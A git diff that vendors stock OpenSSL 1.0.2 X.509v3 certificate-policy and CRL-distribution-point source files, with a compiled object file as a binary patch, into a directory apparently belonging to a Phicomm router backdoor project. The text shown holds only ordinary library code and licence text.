+ASN1_ITEM_TEMPLATE_END(CERTIFICATEPOLICIES)
+
+IMPLEMENT_ASN1_FUNCTIONS(CERTIFICATEPOLICIES)
+
+ASN1_SEQUENCE(POLICYINFO) = {
+        ASN1_SIMPLE(POLICYINFO, policyid, ASN1_OBJECT),
+        ASN1_SEQUENCE_OF_OPT(POLICYINFO, qualifiers, POLICYQUALINFO)
+} ASN1_SEQUENCE_END(POLICYINFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(POLICYINFO)
+
+ASN1_ADB_TEMPLATE(policydefault) = ASN1_SIMPLE(POLICYQUALINFO, d.other, ASN1_ANY);
+
+ASN1_ADB(POLICYQUALINFO) = {
+        ADB_ENTRY(NID_id_qt_cps, ASN1_SIMPLE(POLICYQUALINFO, d.cpsuri, ASN1_IA5STRING)),
+        ADB_ENTRY(NID_id_qt_unotice, ASN1_SIMPLE(POLICYQUALINFO, d.usernotice, USERNOTICE))
+} ASN1_ADB_END(POLICYQUALINFO, 0, pqualid, 0, &policydefault_tt, NULL);
+
+ASN1_SEQUENCE(POLICYQUALINFO) = {
+        ASN1_SIMPLE(POLICYQUALINFO, pqualid, ASN1_OBJECT),
+        ASN1_ADB_OBJECT(POLICYQUALINFO)
+} ASN1_SEQUENCE_END(POLICYQUALINFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(POLICYQUALINFO)
+
+ASN1_SEQUENCE(USERNOTICE) = {
+        ASN1_OPT(USERNOTICE, noticeref, NOTICEREF),
+        ASN1_OPT(USERNOTICE, exptext, DISPLAYTEXT)
+} ASN1_SEQUENCE_END(USERNOTICE)
+
+IMPLEMENT_ASN1_FUNCTIONS(USERNOTICE)
+
+ASN1_SEQUENCE(NOTICEREF) = {
+        ASN1_SIMPLE(NOTICEREF, organization, DISPLAYTEXT),
+        ASN1_SEQUENCE_OF(NOTICEREF, noticenos, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(NOTICEREF)
+
+IMPLEMENT_ASN1_FUNCTIONS(NOTICEREF)
+
+static STACK_OF(POLICYINFO) *r2i_certpol(X509V3_EXT_METHOD *method,
+                                         X509V3_CTX *ctx, char *value)
+{
+    STACK_OF(POLICYINFO) *pols = NULL;
+    char *pstr;
+    POLICYINFO *pol;
+    ASN1_OBJECT *pobj;
+    STACK_OF(CONF_VALUE) *vals;
+    CONF_VALUE *cnf;
+    int i, ia5org;
+    pols = sk_POLICYINFO_new_null();
+    if (pols == NULL) {
+        X509V3err(X509V3_F_R2I_CERTPOL, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    vals = X509V3_parse_list(value);
+    if (vals == NULL) {
+        X509V3err(X509V3_F_R2I_CERTPOL, ERR_R_X509V3_LIB);
+        goto err;
+    }
+    ia5org = 0;
+    for (i = 0; i < sk_CONF_VALUE_num(vals); i++) {
+        cnf = sk_CONF_VALUE_value(vals, i);
+        if (cnf->value || !cnf->name) {
+            X509V3err(X509V3_F_R2I_CERTPOL,
+                      X509V3_R_INVALID_POLICY_IDENTIFIER);
+            X509V3_conf_err(cnf);
+            goto err;
+        }
+        pstr = cnf->name;
+        if (!strcmp(pstr, "ia5org")) {
+            ia5org = 1;
+            continue;
+        } else if (*pstr == '@') {
+            STACK_OF(CONF_VALUE) *polsect;
+            polsect = X509V3_get_section(ctx, pstr + 1);
+            if (!polsect) {
+                X509V3err(X509V3_F_R2I_CERTPOL, X509V3_R_INVALID_SECTION);
+
+                X509V3_conf_err(cnf);
+                goto err;
+            }
+            pol = policy_section(ctx, polsect, ia5org);
+            X509V3_section_free(ctx, polsect);
+            if (!pol)
+                goto err;
+        } else {
+            if (!(pobj = OBJ_txt2obj(cnf->name, 0))) {
+                X509V3err(X509V3_F_R2I_CERTPOL,
+                          X509V3_R_INVALID_OBJECT_IDENTIFIER);
+                X509V3_conf_err(cnf);
+                goto err;
+            }
+            pol = POLICYINFO_new();
+            pol->policyid = pobj;
+        }
+        if (!sk_POLICYINFO_push(pols, pol)) {
+            POLICYINFO_free(pol);
+            X509V3err(X509V3_F_R2I_CERTPOL, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+    sk_CONF_VALUE_pop_free(vals, X509V3_conf_free);
+    return pols;
+ err:
+    sk_CONF_VALUE_pop_free(vals, X509V3_conf_free);
+    sk_POLICYINFO_pop_free(pols, POLICYINFO_free);
+    return NULL;
+}
+
+static POLICYINFO *policy_section(X509V3_CTX *ctx,
+                                  STACK_OF(CONF_VALUE) *polstrs, int ia5org)
+{
+    int i;
+    CONF_VALUE *cnf;
+    POLICYINFO *pol;
+    POLICYQUALINFO *qual;
+    if (!(pol = POLICYINFO_new()))
+        goto merr;
+    for (i = 0; i < sk_CONF_VALUE_num(polstrs); i++) {
+        cnf = sk_CONF_VALUE_value(polstrs, i);
+        if (!strcmp(cnf->name, "policyIdentifier")) {
+            ASN1_OBJECT *pobj;
+            if (!(pobj = OBJ_txt2obj(cnf->value, 0))) {
+                X509V3err(X509V3_F_POLICY_SECTION,
+                          X509V3_R_INVALID_OBJECT_IDENTIFIER);
+                X509V3_conf_err(cnf);
+                goto err;
+            }
+            pol->policyid = pobj;
+
+        } else if (!name_cmp(cnf->name, "CPS")) {
+            if (!pol->qualifiers)
+                pol->qualifiers = sk_POLICYQUALINFO_new_null();
+            if (!(qual = POLICYQUALINFO_new()))
+                goto merr;
+            if (!sk_POLICYQUALINFO_push(pol->qualifiers, qual))
+                goto merr;
+            qual->pqualid = OBJ_nid2obj(NID_id_qt_cps);
+            qual->d.cpsuri = M_ASN1_IA5STRING_new();
+            if (!ASN1_STRING_set(qual->d.cpsuri, cnf->value,
+                                 strlen(cnf->value)))
+                goto merr;
+        } else if (!name_cmp(cnf->name, "userNotice")) {
+            STACK_OF(CONF_VALUE) *unot;
+            if (*cnf->value != '@') {
+                X509V3err(X509V3_F_POLICY_SECTION,
+                          X509V3_R_EXPECTED_A_SECTION_NAME);
+                X509V3_conf_err(cnf);
+                goto err;
+            }
+            unot = X509V3_get_section(ctx, cnf->value + 1);
+            if (!unot) {
+                X509V3err(X509V3_F_POLICY_SECTION, X509V3_R_INVALID_SECTION);
+
+                X509V3_conf_err(cnf);
+                goto err;
+            }
+            qual = notice_section(ctx, unot, ia5org);
+            X509V3_section_free(ctx, unot);
+            if (!qual)
+                goto err;
+            if (!pol->qualifiers)
+                pol->qualifiers = sk_POLICYQUALINFO_new_null();
+            if (!sk_POLICYQUALINFO_push(pol->qualifiers, qual))
+                goto merr;
+        } else {
+            X509V3err(X509V3_F_POLICY_SECTION, X509V3_R_INVALID_OPTION);
+
+            X509V3_conf_err(cnf);
+            goto err;
+        }
+    }
+    if (!pol->policyid) {
+        X509V3err(X509V3_F_POLICY_SECTION, X509V3_R_NO_POLICY_IDENTIFIER);
+        goto err;
+    }
+
+    return pol;
+
+ merr:
+    X509V3err(X509V3_F_POLICY_SECTION, ERR_R_MALLOC_FAILURE);
+
+ err:
+    POLICYINFO_free(pol);
+    return NULL;
+
+}
+
+static POLICYQUALINFO *notice_section(X509V3_CTX *ctx,
+                                      STACK_OF(CONF_VALUE) *unot, int ia5org)
+{
+    int i, ret;
+    CONF_VALUE *cnf;
+    USERNOTICE *not;
+    POLICYQUALINFO *qual;
+    if (!(qual = POLICYQUALINFO_new()))
+        goto merr;
+    qual->pqualid = OBJ_nid2obj(NID_id_qt_unotice);
+    if (!(not = USERNOTICE_new()))
+        goto merr;
+    qual->d.usernotice = not;
+    for (i = 0; i < sk_CONF_VALUE_num(unot); i++) {
+        cnf = sk_CONF_VALUE_value(unot, i);
+        if (!strcmp(cnf->name, "explicitText")) {
+            not->exptext = M_ASN1_VISIBLESTRING_new();
+            if (!ASN1_STRING_set(not->exptext, cnf->value,
+                                 strlen(cnf->value)))
+                goto merr;
+        } else if (!strcmp(cnf->name, "organization")) {
+            NOTICEREF *nref;
+            if (!not->noticeref) {
+                if (!(nref = NOTICEREF_new()))
+                    goto merr;
+                not->noticeref = nref;
+            } else
+                nref = not->noticeref;
+            if (ia5org)
+                nref->organization->type = V_ASN1_IA5STRING;
+            else
+                nref->organization->type = V_ASN1_VISIBLESTRING;
+            if (!ASN1_STRING_set(nref->organization, cnf->value,
+                                 strlen(cnf->value)))
+                goto merr;
+        } else if (!strcmp(cnf->name, "noticeNumbers")) {
+            NOTICEREF *nref;
+            STACK_OF(CONF_VALUE) *nos;
+            if (!not->noticeref) {
+                if (!(nref = NOTICEREF_new()))
+                    goto merr;
+                not->noticeref = nref;
+            } else
+                nref = not->noticeref;
+            nos = X509V3_parse_list(cnf->value);
+            if (!nos || !sk_CONF_VALUE_num(nos)) {
+                X509V3err(X509V3_F_NOTICE_SECTION, X509V3_R_INVALID_NUMBERS);
+                X509V3_conf_err(cnf);
+                goto err;
+            }
+            ret = nref_nos(nref->noticenos, nos);
+            sk_CONF_VALUE_pop_free(nos, X509V3_conf_free);
+            if (!ret)
+                goto err;
+        } else {
+            X509V3err(X509V3_F_NOTICE_SECTION, X509V3_R_INVALID_OPTION);
+            X509V3_conf_err(cnf);
+            goto err;
+        }
+    }
+
+    if (not->noticeref &&
+        (!not->noticeref->noticenos || !not->noticeref->organization)) {
+        X509V3err(X509V3_F_NOTICE_SECTION,
+                  X509V3_R_NEED_ORGANIZATION_AND_NUMBERS);
+        goto err;
+    }
+
+    return qual;
+
+ merr:
+    X509V3err(X509V3_F_NOTICE_SECTION, ERR_R_MALLOC_FAILURE);
+
+ err:
+    POLICYQUALINFO_free(qual);
+    return NULL;
+}
+
+static int nref_nos(STACK_OF(ASN1_INTEGER) *nnums, STACK_OF(CONF_VALUE) *nos)
+{
+    CONF_VALUE *cnf;
+    ASN1_INTEGER *aint;
+
+    int i;
+
+    for (i = 0; i < sk_CONF_VALUE_num(nos); i++) {
+        cnf = sk_CONF_VALUE_value(nos, i);
+        if (!(aint = s2i_ASN1_INTEGER(NULL, cnf->name))) {
+            X509V3err(X509V3_F_NREF_NOS, X509V3_R_INVALID_NUMBER);
+            goto err;
+        }
+        if (!sk_ASN1_INTEGER_push(nnums, aint))
+            goto merr;
+    }
+    return 1;
+
+ merr:
+    X509V3err(X509V3_F_NREF_NOS, ERR_R_MALLOC_FAILURE);
+
+ err:
+    sk_ASN1_INTEGER_pop_free(nnums, ASN1_STRING_free);
+    return 0;
+}
+
+static int i2r_certpol(X509V3_EXT_METHOD *method, STACK_OF(POLICYINFO) *pol,
+                       BIO *out, int indent)
+{
+    int i;
+    POLICYINFO *pinfo;
+    /* First print out the policy OIDs */
+    for (i = 0; i < sk_POLICYINFO_num(pol); i++) {
+        pinfo = sk_POLICYINFO_value(pol, i);
+        BIO_printf(out, "%*sPolicy: ", indent, "");
+        i2a_ASN1_OBJECT(out, pinfo->policyid);
+        BIO_puts(out, "\n");
+        if (pinfo->qualifiers)
+            print_qualifiers(out, pinfo->qualifiers, indent + 2);
+    }
+    return 1;
+}
+
+static void print_qualifiers(BIO *out, STACK_OF(POLICYQUALINFO) *quals,
+                             int indent)
+{
+    POLICYQUALINFO *qualinfo;
+    int i;
+    for (i = 0; i < sk_POLICYQUALINFO_num(quals); i++) {
+        qualinfo = sk_POLICYQUALINFO_value(quals, i);
+        switch (OBJ_obj2nid(qualinfo->pqualid)) {
+        case NID_id_qt_cps:
+            BIO_printf(out, "%*sCPS: %s\n", indent, "",
+                       qualinfo->d.cpsuri->data);
+            break;
+
+        case NID_id_qt_unotice:
+            BIO_printf(out, "%*sUser Notice:\n", indent, "");
+            print_notice(out, qualinfo->d.usernotice, indent + 2);
+            break;
+
+        default:
+            BIO_printf(out, "%*sUnknown Qualifier: ", indent + 2, "");
+
+            i2a_ASN1_OBJECT(out, qualinfo->pqualid);
+            BIO_puts(out, "\n");
+            break;
+        }
+    }
+}
+
+static void print_notice(BIO *out, USERNOTICE *notice, int indent)
+{
+    int i;
+    if (notice->noticeref) {
+        NOTICEREF *ref;
+        ref = notice->noticeref;
+        BIO_printf(out, "%*sOrganization: %s\n", indent, "",
+                   ref->organization->data);
+        BIO_printf(out, "%*sNumber%s: ", indent, "",
+                   sk_ASN1_INTEGER_num(ref->noticenos) > 1 ? "s" : "");
+        for (i = 0; i < sk_ASN1_INTEGER_num(ref->noticenos); i++) {
+            ASN1_INTEGER *num;
+            char *tmp;
+            num = sk_ASN1_INTEGER_value(ref->noticenos, i);
+            if (i)
+                BIO_puts(out, ", ");
+            tmp = i2s_ASN1_INTEGER(NULL, num);
+            BIO_puts(out, tmp);
+            OPENSSL_free(tmp);
+        }
+        BIO_puts(out, "\n");
+    }
+    if (notice->exptext)
+        BIO_printf(out, "%*sExplicit Text: %s\n", indent, "",
+                   notice->exptext->data);
+}
+
+void X509_POLICY_NODE_print(BIO *out, X509_POLICY_NODE *node, int indent)
+{
+    const X509_POLICY_DATA *dat = node->data;
+
+    BIO_printf(out, "%*sPolicy: ", indent, "");
+
+    i2a_ASN1_OBJECT(out, dat->valid_policy);
+    BIO_puts(out, "\n");
+    BIO_printf(out, "%*s%s\n", indent + 2, "",
+               node_data_critical(dat) ? "Critical" : "Non Critical");
+    if (dat->qualifier_set)
+        print_qualifiers(out, dat->qualifier_set, indent + 2);
+    else
+        BIO_printf(out, "%*sNo Qualifiers\n", indent + 2, "");
+}
+
+
+IMPLEMENT_STACK_OF(X509_POLICY_NODE)
+
+IMPLEMENT_STACK_OF(X509_POLICY_DATA)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_cpols.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_cpols.o
new file mode 100644
index 0000000000000000000000000000000000000000..c0bf55c4614b6307bf3f5f12ff7d429396e70568
GIT binary patch
literal 16544
zcmc(m4RqAimB9bW1dT{1(IQ5%cBDarLN*gVO!#UhnF%v=NJ26Jg20fE0jA_*ocRw1
z1);`R{~cm!x3;C-J!Q{<UG4Go(5`O9o`q=vLAIW)weGR2$I>3?Iz|L5i!E-=-uvEt
zGdGX<A8a{i_nkBI-uu0K@4N55kNJNjJAA>$!h!-rr2=EIk*g_c7_No6a-AsF88;d?
z7@n1$6+ZVxPrE17ZoSs#w?6U@y<6e8%<@uyYFl~f+bHX;Jzw&~kHM@!UhATu{!~rC
zIx32b_JNdHx@bQNk8CeAKbKhw;(?U6yx2eTDYRj|;~$xeg<z_#IO9TN*#_%3?liRu
zb3!ke0yjW^+3?wtM_&fTK+0!$txJCEH>Al7y3?e%y;%AtZG(7lWCHd&c7miqJy_E8
zQ+L|uK0RK?Q+srKM<BJm*lYb>wpeN3@M-gwoF+O{Cfb59w6dV}qI=9UCS!npSub8D
zaa@Rx?#USuz%N1rq3{o<&6OAv8WfID1_}()utw*x#>;~>ryNA3)vTtddd6PN%=>t3
z%s+Ir;=Z+>HJ-Jeb)N8%4@z#o<XPz**;?pX0TXY%><I;|3+?W+F#WHt3|jvslxyF9
zc(wJOs%0H`2l@)YIAu@SxX-h3A&}YvL%e8SFK6!UU4I@M8#^}ooz>6dD%G4KqZynq
zbdow{^_#GX)fZ`XvBFrpSbD5}CH=ot{%ZTXI(^){V(0pC>khr^$9?OPE5Rx%hozOg
z-RDlbUwXj<aXRz}d>x(!UqT}Dy=!0(TIWRNxVL-`h7$4$%yEW?(<Q@eV3wo>)XRJX
zUu6Cmwm<qE*j%796Ls)#kh`xINXf`XXiJ&pGjp8gH<(&q?6;1nrG@>3@H|L8RO+Uq
z1=+pXzWc%Yp&|Inc^^zQ6d#5G81A%ZIjxhR-1K7!IJ!PfeF<+pt3CI@NZn_p@8DE1
zIz^Gf^Q9Mj^`{oXMtV=kK;+h|*w{yKo*ZFC(E3nX9vUo#kRC}c@TWGxvOjB9lN-tw
z*sa7^!_bT|h_%vO0OcLeW`0$q!u=QsWVS$c=XRs6WVi)N!e#$RvOxBQXQP;-&9K9z
zk6%V54~kkoBlDI63Uubuo`&uR{X^S}jpTJ?#3yGA4stP{Cs7BEKsd=L4keHN3$Vlc
zz_cKTr$8wHt4kV4L9mBj8VjH|0V@sXxb@*5eh{>d`#*feKeBvGNM#lavk$=;Cl<Vb
zpfMSzxk9uhN_Q@<GfU(+EF8!6cyQq?`NyO$;%EgglO!cZdj`%EVJ=|F75Pvhc)MSD
z8-PGivmD?WXa*?eU!LT!SSOc^Oal(<Vlwt9xe8rsP%c*44Rk;G@U1!Xa@eCwm9&)=
z>k6dg7Q9h7Aj10=%sa+zXd7&|V9GEjdXCo>VMIrZv4n>G6w>^m#EA8QmCWD5m)0pn
zv<llD*h^|M?EhaTZ<3u`KNJ10qyBNL`K?fSjciRp3EBhJaTVJUa3pgKy@8p`3c^p-
zDL)Fk-|(mEAuQhVnjnq1_Q>|l)?2FPhN+9uPq8>kl9S}r?!vK_VU%Ux5YMXI2E#-D
z&@hPPHo8A0mP}4#bkf+7Q42Ov6$}QVC7M;g5ZEds*_?R-nxxsUK<Ut<<4m%%V+EZV
zbb?%dbc8*tM!m38CudH=N~0+?7x{+<iw*M{|4@yg{KqawC+5bYcWRyUu>(kiKpsHi
z0%z?<_%l6zXW~W-<_@GAM*k)^q|CdQ;D;2>*~~B$K+`ZvhNpoMDU#Bi85$RX%zL2Z
zzNk(mx%-m=sVh#~N5;ux#Ks@8EwuLN43>ctt7&z|=pCXEv|N7cSY|)^r)Ei>lcRTO
zKpeg7Z15j1DhCH(c3}$*9ra(~I>8en=iKRbzxC%f>s9zMEDfgaBqwPPoD1N|FDtS$
z6#&o0qVm#_wnC`;<@F+6Hp0@M6fE(ot5dv86_*IY2%0N}?Jx;1aNrm`3VZ4tx|;dN
z3pgjDp7rcLat7ORYzf1des`jwrER`zdSW7$+Y^zvt7*WDc1Pw5&>Y{`*&ltd(~J)E
zXQi5weO;0G^u&CZG1FxTIp1KcH`*OFU7^UJnH6mB-`qd&K)-8wva>h3AsUH;2K3T0
z0J2+AdrN0;GBV$o+27d*St8Oc`Z1!Na|hxZjhK)N^hEkip>2SxMiN|<9vTtq6#Fzl
zA?vBpFNPrfOc)LED2%AH*Jv8(cV#Q!2#vaFAm<^(p{Y3(Xz;cA8p%xmK*DHm^R-G&
zFdo@}{hQczOLH*L(6PMT6AUypHXE_~akxE3Pi1#3k&H*7fKE%FpfX@?io{7tDu{7{
zhET*ffzQ6yP@pl;;0gJJ`GBttrz}sxGYC_u%(CC`b22XJ?W*zrTVMHMm+Rxu<*wF$
zWe*NBkyQPY=5VodRjK2uwEypv^>G$|!mic)TuEG)`=s`-WH;MR9sH&9yf15De8J8?
zyz<MJ?BsRXPb#PDU8z1n6R_=PNkhYYS4DeQvfoU)YAa_~R?TwXn-o>|!_`%lRdZ%Y
zEDhqiz_SJIFKKEwV85o3!9}%5lPNEFu+=CSEG?Ki>DuDmFc*H{w^7>#oSS-Q=~oNu
zon=ord`{O$QN6Qb*94EV>alAYoHaw&E^)4RyjtL_0pf91)H_`u2^#fI9ETS^o5<Fa
zm^Y%WMzjTzBSk*6<;~jiI_nBII%^s)Glk<gKz7u5iTTky?DahC-8@V^4CD4D(^}-L
zA`e@bhqdHkJ$cw*9=0nF+na|yn}?mq!`{rp&gWr8bcplumT7Do#BL_BKjMA0m_xB1
z#2n_<gBRC>*SWKx@I&Y01<Reg;q!PwJpjkeMMPQ@nNmO`0J#U1TJtX=^z9kVr#fJ1
zVh5p&KJ6-8>MVQA;dQ!(ieLp5CMG&vUT2v{tVQ4Tz?V78{Ay*QQvQTtDl*<5%h&2q
zi$-g7WOvp01_xNmmmFeOj&GR+)k0=p>^)$gA+G9T9|4;|{2*;;F*m?4ISibr@d@vS
z3XI(8(!!b@j4Rwo^6LpG`BlWz8poT10_a!q8fyQN;KhcE*57*K-y*(~cm?sNh^L9G
zeqRv$8bg;yHHUFMW|t+0fl<9YISg^FKCa<EL~R0|ljG7G#MQZ}8cz`~QGoI@#9bPH
zhq#7~bHv5nDr>wzyn!(+{)srw4^JP9$^>zKbB_1?_$#oELns#$Piovre6Pmk**L+#
zM=(6yO7dUg5Xvs%yET3%@jV)!N&JTzuO|MS#%qYDHNKem%Nq9*|4)tM>j;d``x=+$
z`2_iph_$UCc^U6q13nN%I}=2n<5+UQ-I$)bK(17WP{-ege0+xuf82(D!-jv)hCgM)
z58Ci!HvBc<HyQ<orJdPlfZu@U66BcF`S5{_okGw@J9{)cw?ZB5)M<9y!1KlJ^JM2~
z&CW_2`3T7$)a19@$frpDB~5-G@n38FpNVHQ{xjl#()cUHucHG<jqx;ajKfY5&0IV$
zlKd^2JnCaSXK4I3;<XyDA|BBA=b<j*ul2i(<U2I^HN>MD-%Na~#vdYXX&mcf{b>Du
zljQek^81KCt??g0UB!@0iR_RK|G5pvhv@n2oU!5W+wdZ|M962S%!a#c_-q@#(1!bM
z_*xs@XTu-1;a|1k-?ib-0LS(DLpmx|OnyTAr^Lne9?aM;ZS4HkhQDva@ls6n#n;1)
zHvD$rxDL~F{;2yKW6SJtH#{0kRCXJ&c(mUPv&Tl!>Ug+25;vjUh*w9m<?J)9a3XSl
z*fiM#Ek(vZ#j>HDJzd)4t}r08tCt?u^+YywCVNfnLE6IyT*_9SXIkN?8R<jm%3y;V
zzpC+THh#^)uPXeSi(m8b>t6h-!LM5Ua*JlSXm<-uw=m)s2He7eTPV7Prdz1Gg>JRb
ztrl9<vTLDLJ;w+y2{zYzg5l=I#x`Fl9P-o$ePJW9IozM@!%RH2G@9#|h6lR7Sltf~
z?&<^0VKEmQWHD(bjA(Tt>}hLqhXYL^-x6P|(a_q_5^4@_h({vO*eM&qimxHWgC*Ko
z@S>(6%!o*d#vYj1Jh9C8%n;(sv_TPi?#Zj1>jNb6n(B`{z-(bHj}vlu=wWUMqEA-M
z6~kyHC!BqRDkW4E2Z3&nr}{cXQ{yFazOcu)xuP<gBYan&xm-)mRCXujo)arW`I^uS
zuAImNuzGrX4PR?(IF>ZSk$8L{ZmgPHRl8z#IMx|YM8dt%glQzqcz0h+EG~1<tcC?9
zR62Wlq)ND_)9h4w^uSy?2ff6SiA}0)W5k4gCmyI9_;@|6%))vVX2pcJg<1nmOTy;X
zSVYVPhlvQd0~0BjTEtvHEJo~hASPX);dBr5Z;&7xkz6~?Vz{Z<>yvxN@CMpif}W0$
zZ&fI}Ua7xqUG9@?HQ<>`uB!#^Y3jgMbvPQv9dyXTacsEZ^FQ?9?_S2M8Lwx2HscZE
zaJggPds1Zw??W*mzZpJ?Ka3EPE|2dWF(EI5kCOiyLP+Q*{sn~M&m)AS+c_+;;I}|o
z$)6;y+j*679tU-QqT4^s?Bm;DW&bSWQyEwHCwjlv((e{>-ftP>JpOkPM}P3Spz3!H
zlgE2k#Tyx)$GE(2lJVs7-Ao?WfU?ue`o(7;iknQH+Zkc<d_8=N@!Of5e_(d_{C=Ow
zb31q+gbCyDS@<Y_4%yf_$vEEYDEU{I9X_sKGkHF)DcB(-eZI;W=ks+Bam={?3mA7n
zoARfg+2L_m#yIys#O!eY@$V-vp`YCU-AsNyw5fjgGQNoM12#Nu!+&AJPchE>J#WL+
zBRp*8@}+RyjtRLRKFWWW4afT?OuBrX4R2w58R#kd>uq?<hVQiDyBTj~_V?QG12+6u
z#BqMxnVpM_uVCDPf{-v<2_H2syidV|89u{Od^zL%T#7Qz*LjRM#`z9rX9tsC#rW45
z?_m5{#<~9|nEh!?{@)q@9OG{?Ud}k)k6^-VHGI@~&oN%h_{WUj$M~n=z5^3BuYr%U
z^I68Zof^jZxB`sxcy<%Vcur^bH#2!2&mqS7d_BkbT4v{W#L@npjK9O=*D-#HalYOh
z@CXSL#$hRZR2-%<&f_zS@i3EL!1#K`I~ng}{C?u-|6Po4Ve;Jne`1`+;TYrG|2G)t
zex7E$nf3cI<2?RTt_2}T7#}{rpCOL^<Fj@Zx0y_y&+mN3*E9JqFgy4TLfL6!^4v~@
z@eq@LhH)O}G_!v<lRv@ax&7ZU&h4vL8W;zD{>&%_00}vdo6m-~G0x+;j`1$ArQ)!S
zalQ`!o^ie(_Yudjb~8IaVDdeTA7Szl#{bPm{ygKnU&nQz3<=i*KgT9AJ`LK`xNc^=
zoblU;V?6o!7Ga$C8)N(n%+3zR`MLKE#`!t0k8vL7KQPYwEtm+MK|(+I`9F<uE<cMn
z#)rpY4&yv-3mNC}X=3(yd{#2v2z{tHM~UAJjL+}=OumQ7KWHQWh>iRRaU2)_z4*F~
z{PRq{mGyg)@hOb|mT?#3zi0OOb>;_**D(1@%nrZKETmU`IFI}~b24!p*FDV6RK{mA
zemCQ@7@y5JA6E@=?3erBV<X?scqOy{BsvHQ?JR(gn)m&TFJ}BX#_JeA#&|vBuQAT;
zpJANa|8K^*{Rs{*3JLw>_HSaG+nLUI9q6cW&1Ib1@iET*Y-gO?k1)>dCmHAVhZ*Pg
zpJbfd-_JO={~Y7o{=c$y%k6KmStsflGv4Nr2$T$?N_@-LVtC1OGYUXzkr_M@m-6eW
z9%CHk?;-i!jHCTD)ekU^@_v$kopF?R5r13bJBgQ4j+wAe^(w~E{&uR%_os4PcqA)3
zF-`vOsQzsmzL#;lFH`9R<9Pq5QfZ+qVKWvlkevFv7R3+Jyq1w7a`a!lH+C_;iOQJO
zQCZ2~LH7NON2!e2AmeC%9?9=y9M4si_EJIFuOs=V80Y@*c|`jwN&Xa*|00z|M(xVJ
zS`WpH<9ww_NA<7d!z8Elu)3LKG1KRF6UpOyZA_TqeXdISyeCPH&wH;DhWvGA2gmz3
z)lV@#ZoF(gp#0ZJu9$H(ci4>!zaU{ViHN%LL2<RNo)xV*dG+4=gvQl->^C*8-b<g?
zxO)FwME<IN)qCbLjjQ*}^6w~e{;2oNb(*|-&m7YDb+j+kys3U~A-+wMpFw=L#%qc1
z(|CaR^BV6U{&S5-iL3cl{%j?#=0S0bxSC(Z_Yl7g0VKtrCSIlSgTxPLT)m$>s&Vyx
z(x^;q?K3;OAUESO-=s?MNN;DQ_}lbK@xGw4E0HiN;{#Yhad#!W@e)FUKnWTvdk653
z<S*k!W%oc|AN&!%Q3-#;9;t*s@|=}0JG(biePe&JG8P|*!E48@q#fA=5B%Y!gN(q{
zeY-#%r;2Vvv&QPE^dSC7utd|EB~zh<*A{hIA`9Oxm-!z{WsZMeg}TMEDxT3}@lN<4
zr)feY(hFL@itGL3wIJI3YxVKo5pCi<Ay2CR16qfws&XGFVOj5g=clB#3R+*vwo4T#
zuY){a{C49-F(h@aV*GH9^!VX3iG2O1Q2~<r9hEi1aH#_2t02$Ue+53ohotn;9QLjE
zk7qRYUj-kYesP1W-NPZ2Q5KWR;lE_EWzj%iACW$1SXO$94?zJR9cW?3KSB`6C9~|e
z@?U}PLIG{+`YzJfCsx=0Cg|piUk%=rL8>Fe7(ZMRN}pe^=zXJ}>n8k$>qoji#chN!
o*7fl>USE5Fj2OP$fOHrBShA$Y55t^Ke-JN*A?=r0_FLEgU;Nk}0RR91

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_crld.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_crld.c
new file mode 100644
index 0000000..d3e1d1b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_crld.c
@@ -0,0 +1,562 @@
+/* v3_crld.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
